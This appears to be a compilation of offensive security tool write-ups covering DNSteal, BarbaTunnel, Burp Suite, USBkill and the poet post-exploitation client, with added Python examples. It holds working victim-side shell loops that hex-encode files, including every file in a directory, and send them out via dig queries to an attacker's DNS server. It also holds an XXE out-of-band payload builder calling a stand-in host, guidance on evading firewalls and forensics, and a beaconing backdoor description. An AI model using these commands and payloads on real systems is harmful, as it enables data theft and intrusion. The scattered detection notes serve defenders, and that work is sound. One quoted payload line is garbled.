data exfiltration – DNSteal


DNSteal is a data exfiltration tool for stealthily sending files out of a network inside DNS requests. Once set up and running it acts as a fake DNS server: the victim machine encodes a file into DNS query names aimed at it, and the server reassembles the file from the queries it receives.

Install & start server
git clone /opt/dnsteal

cd /opt/dnsteal && python

Transfer file from the victim
On the victim machine, you can do something like this (each line of xxd -p output becomes one query, with the file name appended as the trailing labels):
for b in $(xxd -p file/to/send.png); do dig @server $b.filename; done

On the server side you will see the file transfer start. When the transfer is finished, stop the server with CTRL-C to save the file and print its md5sum.
You can verify the md5sum on the victim's machine by running
md5sum filename


Support for multiple files
DNSteal supports exfiltrating multiple files in one run; the file name appended to each query tells the server which file a chunk belongs to. Use it as below:
for filename in $(ls); do for b in $(xxd -p $filename); do dig +short @server $b.$filename; done; done
gzip compression supported

It also supports gzip compression of the file, which means fewer queries and a faster transfer. Start the server with the "-z" switch:
python -z

Then on the victim machine send the gzipped file like below:
for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename; done

For multiple gzip-compressed files use as below:
for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server $b.$filename; done; done
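The following is an added example, not dnsteal's own code. It models what the xxd -p | dig loops above actually put on the wire and what the server has to do to get the file back: xxd -p prints 30 bytes (60 hex characters) per line, the shell loop sends one query per line, so every query name is one 60-character hex label (under the 63-octet label limit) followed by the file name. The server groups queries by that trailing file name, concatenates the hex in arrival order, optionally gunzips (the -z mode), and the md5sum is compared at both ends exactly as the text describes. The sample file contents are constructed.

```python
import gzip
import hashlib

# Added example, not dnsteal's code. One query per `xxd -p` line: 60 hex
# characters, which keeps the label under the 63-octet DNS label limit.
HEX_PER_QUERY = 60


def md5hex(data: bytes) -> str:
    """The digest the server prints on CTRL-C and `md5sum` prints on the victim."""
    return hashlib.md5(data).hexdigest()


def encode_file(data: bytes, filename: str, compress: bool = False) -> list[str]:
    """Victim side: the query names the shell loop would send for `data`.

    compress=True mirrors piping through `gzip -c` first (the server's -z mode).
    """
    if compress:
        data = gzip.compress(data)
    hexdata = data.hex()
    return [hexdata[i:i + HEX_PER_QUERY] + "." + filename
            for i in range(0, len(hexdata), HEX_PER_QUERY)]


def reassemble(queries: list[str], filenames: list[str],
               compress: bool = False) -> dict[str, bytes]:
    """Server side: group arriving query names by trailing file name, strip it,
    and concatenate the hex labels in arrival order. `dig` runs one query at a
    time, so arrival order is file order."""
    files: dict[str, bytes] = {}
    for name in filenames:
        suffix = "." + name
        hexdata = "".join(q[:-len(suffix)] for q in queries if q.endswith(suffix))
        raw = bytes.fromhex(hexdata)
        files[name] = gzip.decompress(raw) if compress else raw
    return files


def demo() -> dict[str, bool]:
    """Round-trip two constructed files, plain and gzipped, and compare md5sums."""
    png_like = bytes(range(256)) * 3          # constructed stand-in for send.png
    notes = b"exfil me\n" * 20                # constructed second file
    plain_q = encode_file(png_like, "send.png") + encode_file(notes, "notes.txt")
    gz_q = encode_file(png_like, "send.png", compress=True)
    plain = reassemble(plain_q, ["send.png", "notes.txt"])
    gz = reassemble(gz_q, ["send.png"], compress=True)
    return {
        "plain_ok": md5hex(plain["send.png"]) == md5hex(png_like)
                    and md5hex(plain["notes.txt"]) == md5hex(notes),
        "gzip_ok": md5hex(gz["send.png"]) == md5hex(png_like),
        "gzip_fewer_queries": len(gz_q) < len(encode_file(png_like, "send.png")),
    }


if __name__ == "__main__":
    print(demo())
```

Two practical points follow from the model. Because dig is pointed at @server directly, no recursive resolver sits in the path; if the victim had to go through the corporate resolver instead, repeated identical chunks would be answered from its cache and never reach the server, so the reassembled file would be corrupt. And on the detection side, a stream of queries whose first label is 60 hexadecimal characters to a single external name is exactly the pattern a DNS log query should look for.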


firewall evasion – BarbaTunnel


BarbaTunnel is software that helps you bypass firewalls and internet censorship. It is a peer-to-peer tunnel, so you need a server outside the firewalled network. In most cases you can simply use a VPN or a proxy, but a firewall can recognise that you are using a VPN: it does not know what you do over it, yet VPNs and many proxies do not hide their protocol fingerprint. BarbaTunnel sits as a layer on your network and tries to make the existing VPN packets look like ordinary traffic. It does not work alone; it works together with a VPN. So if you have a VPN and no problems with it, you do not need BarbaTunnel, but if the firewall blocks your VPN connection or throttles its speed, BarbaTunnel may help.

Attention: BarbaTunnel is not a standalone tunnel; you must run a tunnel application or establish a standard VPN connection after starting BarbaTunnel.


BarbaTunnel requires .NET Framework 4.5 for "Barba Monitor" and "Barba Service", but BarbaTunnel.exe itself does not need .NET Framework, so you can run it manually on both the client and the server without it.
Configure Server

Login to your Windows Server.
Download BarbaTunnel and extract it.
Open “barbatunnel.ini” in BarbaTunnel folder and set “ServerMode=1”
Go to the BarbaTunnel folder, open the "config\servername" folder, then open the "HTTP-Retunnel.ini" file.
Set “ServerAddress” to your server ip address (required).
Run “Install.vbs”
Run “Run.Vbs”
The server is already configured for specific ports; for custom configuration see "config.ini".
Configure Client Machine

Login to your Windows Client.
Download BarbaTunnel and extract it.
Copy the "config" folder and the config files you already created on the server machine.
Run “Install.vbs”
Run “Run.Vbs”
Try to establish a VPN connection to your server

It is recommended to rename the "servername" folder to your server name or server IP (optional).
Ensure the major version of BarbaServer and BarbaClient is the same, e.g. 1.0 and 1.1.
Make sure the server config file and the client config file are identical.
Make sure the enterprise firewall does not block the tunnel ports.
Make sure your local firewall, such as Windows Firewall, does not block the tunnel ports or BarbaTunnel.
Make sure you can still reboot your system if you lose the connection to your server; if your ability to reboot the server is limited, create a timer job that restarts it before you run BarbaTunnel.
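The checklist above is easy to get wrong by hand, so here is an added pre-flight check written for this page (it is not part of BarbaTunnel). It interprets only the two keys the text names, ServerMode in barbatunnel.ini and ServerAddress in HTTP-Retunnel.ini, treats every other key as opaque and simply compares client and server copies, and checks the major version rule. The assumption that both files are plain key=value INI text with optional [sections] and ';' comments is ours; the sample file contents are constructed.

```python
import ipaddress

# Added example, not BarbaTunnel's code. Automates the checklist above before
# Run.vbs is started. File layout (key=value, optional [sections], ';' comments)
# is an assumption; only ServerMode and ServerAddress are interpreted.


def parse_ini(text: str) -> dict[str, str]:
    """Minimal key=value parser; section names are folded into the key."""
    values: dict[str, str] = {}
    section = ""
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()        # drop comments
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip() + "."
            continue
        if "=" in line:
            key, value = line.split("=", 1)
            values[section + key.strip()] = value.strip()
    return values


def same_major(server_version: str, client_version: str) -> bool:
    """1.0 and 1.1 share major version 1 and are compatible; 1.x and 2.x are not."""
    return server_version.split(".")[0] == client_version.split(".")[0]


def preflight(server_barbatunnel_ini: str, server_retunnel_ini: str,
              client_retunnel_ini: str, server_version: str,
              client_version: str) -> list[str]:
    """Return the list of problems found; an empty list means the checklist passes."""
    problems: list[str] = []
    main = parse_ini(server_barbatunnel_ini)
    server = parse_ini(server_retunnel_ini)
    client = parse_ini(client_retunnel_ini)

    # Step: barbatunnel.ini on the server must say ServerMode=1.
    mode = [v for k, v in main.items() if k.endswith("ServerMode")]
    if mode != ["1"]:
        problems.append("server barbatunnel.ini must set ServerMode=1")

    # Step: ServerAddress is required and must be the server's IP address.
    addr = next((v for k, v in server.items() if k.endswith("ServerAddress")), "")
    try:
        ipaddress.ip_address(addr)
    except ValueError:
        problems.append(f"ServerAddress must be the server's IP address, got {addr!r}")

    # Step: the client copy of the config must be identical to the server's.
    if server != client:
        diff = sorted(k for k in set(server) | set(client) if server.get(k) != client.get(k))
        problems.append("client and server HTTP-Retunnel.ini differ on: " + ", ".join(diff))

    # Step: BarbaServer and BarbaClient must share a major version.
    if not same_major(server_version, client_version):
        problems.append(f"major version mismatch: server {server_version}, client {client_version}")
    return problems


if __name__ == "__main__":
    # Constructed sample files.
    ok_main = "ServerMode=1\n"
    ok_cfg = "[General]\nServerAddress=203.0.113.10 ; public IP\nKeepAlive=30\n"
    print(preflight(ok_main, ok_cfg, ok_cfg, "1.0", "1.1"))
```

Run it against the real files before Run.vbs on the client; anything it prints is one of the checklist items above that would otherwise show up only as a VPN that never connects.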


Pentest tools – Burp Suite Professional v1.6.23

Burp Suite contains the following key components:
An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
An application-aware Spider, for crawling content and functionality.
An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
A Repeater tool, for manipulating and resending individual requests.
A Sequencer tool, for testing the randomness of session tokens.
The ability to save your work and resume working later.
Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.

Burp is easy to use and intuitive, allowing new users to begin working right away. Burp is also highly configurable, and contains numerous powerful features to assist the most experienced testers with their work.
Release Notes


This release adds a new scan check for external service interaction and out-of-band resource load via injected XML DOCTYPE declarations containing parameter entities. Burp now sends payloads like:

%f5a30; ]>

and reports an appropriate issue based on any observed interactions (DNS or HTTP) that reach the Burp Collaborator server.
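As an added illustration (not Burp's code), the block below shows the shape of such a probe, since the payload quoted above lost its opening DOCTYPE markup in extraction, and the correlation step a Collaborator-style server performs: each injected payload carries a unique subdomain, so any DNS lookup or HTTP request that later arrives for that name proves the target's XML parser dereferenced the external entity. The collab.example domain, the interaction log format and the sample scenario are assumptions constructed for the example.

```python
import re
import secrets

# Added example, not Burp's code. COLLAB_DOMAIN stands in for the Collaborator
# server's domain; the log line format below is an assumption.
COLLAB_DOMAIN = "collab.example"


def oob_payload(token: str, domain: str = COLLAB_DOMAIN,
                body: str = "<order><id>1</id></order>") -> str:
    """XML whose DOCTYPE declares a parameter entity with an external SYSTEM
    identifier and dereferences it with %p;. The body uses no entity at all:
    a parser that loads external DTD resources still resolves the host name
    (DNS) and usually fetches the URL (HTTP), which is all the check observes."""
    return ('<?xml version="1.0"?>'
            f'<!DOCTYPE x [<!ENTITY % p SYSTEM "http://{token}.{domain}/">%p;]>'
            + body)


def new_token() -> str:
    """Unique label per insertion point, so a hit maps back to one request."""
    return secrets.token_hex(6)


def correlate(issued: dict[str, str], interactions: list[str],
              domain: str = COLLAB_DOMAIN) -> dict[str, set[str]]:
    """issued maps token -> where it was injected; interactions are log lines
    'DNS <qname>' or 'HTTP <host> <path>'. Returns, for each issued token that
    was actually dereferenced, the set of interaction types observed."""
    hits: dict[str, set[str]] = {}
    line_re = re.compile(r"^(DNS|HTTP)\s+(\S+)")
    for line in interactions:
        m = line_re.match(line)
        if not m:
            continue
        kind, host = m.group(1), m.group(2).rstrip(".").lower()
        if not host.endswith("." + domain):
            continue                                  # unrelated traffic
        token = host[:-len(domain) - 1].split(".")[-1]
        if token in issued:                           # ignore names never handed out
            hits.setdefault(token, set()).add(kind)
    return hits


def has_doctype(document: bytes) -> bool:
    """Application-side ingress check: a document carrying any DOCTYPE can
    declare entities, and most applications never need one."""
    return re.search(rb"<!DOCTYPE", document, re.IGNORECASE) is not None


def demo() -> dict[str, set[str]]:
    # Constructed scenario: two insertion points, only the first reaches a
    # parser that resolves external entities; a third token was never issued.
    issued = {"a1b2c3d4e5f6": "POST /api/import body", "0f0e0d0c0b0a": "X-Data header"}
    log = [
        "DNS a1b2c3d4e5f6.collab.example.",
        "HTTP a1b2c3d4e5f6.collab.example /",
        "DNS ffffffffffff.collab.example.",
        "DNS www.example.org.",
    ]
    return correlate(issued, log)


if __name__ == "__main__":
    print(demo())
```

The DNS hit alone is enough to report the issue: many back ends sit behind egress filtering that blocks the HTTP fetch but still lets the resolver leak the lookup, which is why the release notes count either interaction type.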

The release also fixes some issues:

Some bugs affecting the saving and restoring of Burp state files.
A bug in the Collaborator server where the auto-generated self-signed certificate does not use a wildcard prefix in the CN. This issue only affects private Collaborator server deployments where a custom SSL certificate has not been configured.


python – USBkill anti-forensic usb killswitch


USBkill is an anti-forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer (or first runs self-destruct commands of your choosing and then shuts down).

To install dependencies:
sudo apt-get update
sudo apt-get install python2.7
sudo apt-get install secure-delete

To run:
sudo python

Some reasons to use this tool:

You don’t want someone to retrieve documents from your computer or install malware/backdoors via USB.
You want to improve the security of your full disk encrypted home or corporate server.

Important: Make sure to use disk encryption! Otherwise they will get in anyway.
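To make the kill-switch logic concrete, here is an added example written for this page (it is not usbkill's code). It snapshots the vendor:product IDs reported by lsusb at start, polls, and fires when any device disappears or a device not on the whitelist appears; the shutdown action is injected so the logic can be exercised without powering anything off. The lsusb output below is constructed, and the lsusb line format and the policy "removal always fires, additions fire unless whitelisted" are assumptions of this example.

```python
import re
from collections import Counter
from typing import Callable, Iterable, Optional

# Added example, not usbkill's code. Detection only: the real tool would
# invoke `lsusb` in a loop and run shutdown/self-destruct commands on a hit.
_ID_RE = re.compile(r"\bID ([0-9a-f]{4}:[0-9a-f]{4})\b")


def parse_lsusb(output: str) -> Counter:
    """vendor:product IDs with multiplicity; two identical sticks count twice."""
    return Counter(_ID_RE.findall(output))


def change_reason(baseline: Counter, current: Counter,
                  whitelist: set[str]) -> Optional[str]:
    """None if nothing relevant changed; otherwise why the switch should fire."""
    removed = baseline - current          # Counter subtraction keeps positive counts only
    if removed:
        return "device removed: " + ", ".join(sorted(removed))
    added = current - baseline
    suspicious = [dev for dev in added if dev not in whitelist]
    if suspicious:
        return "unknown device added: " + ", ".join(sorted(suspicious))
    return None


def watch(samples: Iterable[str], whitelist: set[str],
          shutdown: Callable[[str], None]) -> Optional[int]:
    """Consume successive `lsusb` snapshots; the first is the baseline.
    Calls shutdown(reason) once and returns the index of the offending
    snapshot, or None if every snapshot was acceptable."""
    it = iter(samples)
    baseline = parse_lsusb(next(it))
    for index, snapshot in enumerate(it, start=1):
        reason = change_reason(baseline, parse_lsusb(snapshot), whitelist)
        if reason is not None:
            shutdown(reason)
            return index
    return None


# Constructed lsusb-style snapshots.
BASELINE = (
    "Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub\n"
    "Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub\n"
)
TRUSTED_STICK = "Bus 001 Device 005: ID 0781:5567 SanDisk Corp. Cruzer Blade\n"
UNKNOWN_STICK = "Bus 001 Device 006: ID 13fe:4200 Kingston Technology Company Inc.\n"

if __name__ == "__main__":
    watch([BASELINE, BASELINE + UNKNOWN_STICK], {"0781:5567"},
          lambda reason: print("would shut down:", reason))
```

Counting multiplicity matters: a forensic tool that swaps a whitelisted stick for a second identical model shows the same ID set, so a plain set comparison would miss the unplug step that a Counter catches. And the page's warning still applies: without full disk encryption the shutdown only buys time.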


python – poet post-exploitation tool


This program can be used in the post-exploitation stage. You run the client in daemonized mode on the target with an interval at which it connects back. Whenever the server isn't running, the client sleeps and tries again at the next interval. When you start the server, you are presented with a control shell with various commands and actions to choose from.
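The fixed-interval retry loop described above is also what gives this kind of client away on the network. The block below is an added example, not poet's code: the first function models the client behaviour the paragraph describes (try every interval, sleep while the server is down, succeed once it listens), and the second is the check a defender runs over outbound connection timestamps, which for a beacon have almost no jitter while human-driven traffic does. Timestamps are plain seconds and the human-like sample is constructed.

```python
import statistics
from typing import List, Optional, Tuple

# Added example, not poet's code. Models the beaconing client described above
# and the periodicity check that detects it.


def beacon_schedule(interval: float, server_up_at: float, start: float = 0.0,
                    max_attempts: int = 100) -> Tuple[List[float], Optional[int]]:
    """Times at which the client tried to connect, plus the index of the
    attempt that succeeded (None if the server never came up in time)."""
    times: List[float] = []
    t = start
    for attempt in range(max_attempts):
        times.append(t)
        if t >= server_up_at:          # listener is up: the operator gets a shell
            return times, attempt
        t += interval                  # nobody home: sleep the configured interval
    return times, None


def jitter(timestamps: List[float]) -> float:
    """Coefficient of variation of the gaps between consecutive connections:
    0.0 is perfectly periodic; values near or above 1.0 are irregular."""
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if len(gaps) < 2:
        return float("inf")
    mean = statistics.fmean(gaps)
    return statistics.pstdev(gaps) / mean if mean > 0 else float("inf")


def looks_like_beacon(timestamps: List[float], max_jitter: float = 0.1,
                      min_events: int = 5) -> bool:
    """Flag a destination once there are enough connections and they are regular."""
    return len(timestamps) >= min_events and jitter(timestamps) <= max_jitter


if __name__ == "__main__":
    times, hit = beacon_schedule(interval=30, server_up_at=125)
    print(times, hit, looks_like_beacon(times))
```

Every failed attempt while the server is down is still a connection attempt in the proxy or firewall log, so the client is most visible precisely when its operator is not listening; adding random jitter to the interval is the standard counter, and tightening max_jitter is the defender's.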


Getting started

Go to the releases page and download the latest poet-client and poet-server files available.
Then skip to the Usage section below.
Alternatively, you can build Poet yourself (it’s pretty easy). Make sure you have the python2.7 and zip executables available.
git clone
cd poet

This will create a bin/ directory which contains poet-client and poet-server.
